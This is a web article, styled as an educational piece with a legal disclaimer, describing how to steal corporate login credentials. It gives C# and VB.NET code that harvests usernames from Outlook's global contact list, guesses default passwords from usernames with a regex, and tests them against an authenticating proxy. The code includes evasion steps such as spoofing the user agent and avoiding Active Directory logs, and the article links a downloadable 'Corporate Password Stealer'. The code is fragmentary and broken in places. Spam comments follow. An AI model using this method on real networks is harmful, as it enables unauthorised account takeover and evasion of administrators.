Stealing Corporate Login Passwords

Legal disclaimer: All the information and software contained in or linked from this page is for educational purposes only. It is illegal to use the information herein in real world situations without prior authorization from the individual users and the network administrator of your network. Tredosoft does not condone the use of this information and the linked software and shall not be held responsible for the (mis)use of this information and the linked software. This information and the linked software is available "As Is" and confers absolutely no rights whatsoever. If you do not agree leave this page immediately and do not download or use the linked software.

Take the following hypothetical situation: A network administrator creates a new account for a user in Microsoft's Exchange Server. He leaves the "Reset Password on First Login" option toggled to off (which I believe is the default behavior?). The user receives his/her new password and never feels inclined to change their default password (why should they?). Thus, creating a possible attack strategy for hackers to hack into the network using default user credentials. I have seen some corporate networks with extremely rigid security practices regarding user credentials. For example, one of the networks I used not only enforced resetting the password on first login but also enforced a monthly change of the password. Moreover, the default password was autogenerated based on information not normally accessible to the public. The last rule is extremely important. Generating a default (a first time password) must never use information available to the general public. An example of private information good for default passwords is the social security number, employee number, or a combination of two private information such as the birth date and mobile number. Even better, why not generate a random password and pass it on to the final user along with the username; after all the user will be forced to change it on first login anyway. Some incompetent administrators not only allow the default password to remain unchanged after the first login but they also generate passwords that are as insecure as passwords based on the username or passwords found in common password dictionaries.

Let's suppose I am a malicious user trying to get good network credentials (perhaps with higher security permissions) from a network I have a physical access to. This network is run by an incompetent administrator who never enforces changing the default password at all. To make matters worse, she is generating very weak passwords based on the usernames or based on a known password dictionary list.

The first thing I would need is a list of valid usernames. If I am on an active directory network then I would fireup Outlook and parse all the emails from the "Global Contact List". To do that programmatically I would first add all the contacts from the global contact list to my own contact list and then connect to Outlook via .NET/COM and automate the process. We will demonstrate with .NET code how this can be achieved.

// C# 
// You must add a reference to Outlook 
using Microsoft.Office.Interop.Outlook;
int main( string[] args)
//open outlook and get the local contact list folder
  Application outlook = new Application();
  NameSpace ons = outlook.GetNamespace("MAPI");
  MAPIFolder ofolder = ons.GetDefaultFolder

//Storing a username list is as easy as
  ArrayList userlist = new ArrayList();
  foreach (ContactItem ci in ofolder.Items)
  for (int i = 0; i < userlist.Count; i++)
    Console.WriteLine("Username: {0}", userlist[i]);

' You must add a reference to Outlook 
Imports Microsoft.Office.Interop.Outlook

Sub Main()
  'open outlook and get the local contact list folder
  Dim outlook As new Application()
  Dim ons As NameSpace = outlook.GetNamespace("MAPI")
  Dim ofolder As MAPIFolder = ons.GetDefaultFolder _
  'Storing a username list is as easy as
  Dim userlist As New ArrayList()
  For Each ci As ContactItem In ofolder.Items
  For i As Integer = 0 To userlist.Count
    Console.WriteLine("Username: {0}", userlist[i]);
End Sub

Some of you are probably thinking "you could've used classes in the System.DirectoryServices to iterate usernames". We basically don't want to assume that our computer is logged in (or could log in to a domain in the Active Directory).

Once we have a list of usernames we need to think of an attack strategy based on the information available to us. As discussed earlier, an incompetent network administrator could generate a default password based on the usename itself using a set rule. For example, some administrators use the last 5 letters of the username as the default password; so if the username is "imauser" we could guess that the password if never changed would be "auser". Alternatively, we could guess the password based on a password dictionary but that could lead to a false-positive with regards to the incompetence of the network administrator (meaning it is possible that the user changed the default password to a weak password that exists in our password dictionary which is not the point of this article). Guessing the password based on a set rule is achieved programmatically by text processing the usernames. We shall use regular expressions for their intuitive nature. First we create a regular expression that parses portions of the username so they can be used to reconstruct a default password. For example the following regular expression parses the last five characters of a seven character username:

using System.Text.RegularExpressions;
//                   /-username-\/-regular expression-\
Match m = Regex.Match("imauser",   "^..(.{5})$");
string thePassword = m.Groups[1]
Imports System.Text.RegularExpressions
'                          /-username-\/-regular expression-\
Dim m As Match = Regex.Match("imauser",   "^..(.{5})$")
Dim thePassword as string = m.Groups[1]

So now we have a list of usernames and we can generate passwords for testing. How can we test them to see if a certain user is using the default password/a dictionary password? There are many ways of doing that. You could manually test them by logging in with each username and the default password or a password from the dictionary until you get a match but as you are probably thinking right now this is a very time consuming process. You could alternatively test these credentials programmatically by either connecting to the corporate proxy server (if and only if it requires authentications) or by connecting to the Active Directory. A smart hacker would probably avoid trying usernames on the Active Directory because this is where a network administrator would look for any suspicious activity. If proxy authentication is not enabled then you can refer to the System.DirectoryServices documentation on MSDN for ways to authenticate against an AD server. The following code shows how you can check a username and a password on a proxy server regardless of the implemented authentication method ( Basic/Digest/NTLM etc.):

using System.Net;

HttpWebRequest wr = (HttpWebRequest)WebRequest.Create("");
wr.Method = "HEAD"; // To reduce bandwidth but is considered a suspicious activity
//just to be safe
wr.PreAuthenticate = true; 
wr.Pipelined = false;
wr.KeepAlive = false;
wr.UnsafeAuthenticatedConnectionSharing = false; //very important if using NTLM!
//to look innocent
wr.UserAgent = "Mozilla/4.0 (Compatible; IE6.0; Windows NT 5.1; SV1)"; 
//set proxy server
//the domain name is only required if the proxy server uses NTLM authentication.------v
wproxy.Credentials = new NetworkCredential(USERNAME_TO_TEST, PASSWORD_TO_TEST, DOMAIN_NAME);
wr.Proxy = wproxy;
WebResonse wR = null;
bool goodpassword = false;
  wR = wr.GetResponse();
  goodpassword = true;
catch (WebException ex)
  //if authentication fails a WebException is raised
  goodpassword = false;
Imports System.Net

Dim wr As HttpWebRequest = CType(WebRequest.Create("", HttpWebRequest);
wr.Method = "HEAD" 'To reduce bandwidth but is considered a suspicious activity
'just to be safe
wr.PreAuthenticate = True
wr.Pipelined = False
wr.KeepAlive = False
wr.UnsafeAuthenticatedConnectionSharing = False; 'very important if using NTLM!
'to look innocent
wr.UserAgent = "Mozilla/4.0 (Compatible; IE6.0; Windows NT 5.1; SV1)"
'set proxy server
'the domain name is only required if the proxy server uses NTLM authentication.----v
wproxy.Credentials = New NetworkCredential(USERNAME_TO_TEST, PASSWORD_TO_TEST, DOMAIN_NAME)
wr.Proxy = wproxy;
Dim wR As WebResonse = Nothing
Dim goodpassword As Boolean = False
  wR = wr.GetResonse()
  goodpassword = True
Catch ex As WebException
  'if authentication fails a WebException is raised
  goodpassword = false
End Try

I programed a little console application as a proof-of-concept to demonstrate how easy it would be to obtain a list of usernames and passwords. It is done in C# and there are several assumptions for the proof-of-concept to work. They are...

  • You have access to a machine connected to a local network with the .NET framework 2.0 installed.
  • You know the hostname of the proxy server and the port number.
  • The proxy server require authentication.
  • If the network implements a proxy server with NTLM authentication, you know the user domain.
  • You have Microsoft Outlook installed and your contact list is filled with the emails of ALL users on the network.
  • If you are guessing passwords based on a regular expression, you know how to write one.
  • If you are guessing passwords based on a dictionary, you have a text file with a password on each line.
  • The code is theoretical, was never tested, and should never be tested.

corp pass thumbnailClick to enlarge.

It is all straight forward, you'd only have to follow the instructions.

Download Tredosoft's Corporate Password Stealer. (207KB)

wow great i have read many

wow great i have read many articles about this topic and every time i learn something new i dont think it will ever stop always new info , Thanks for all of your hard work!
personal statement sample essays
personal statement sample essays

Hello Every

Recent comments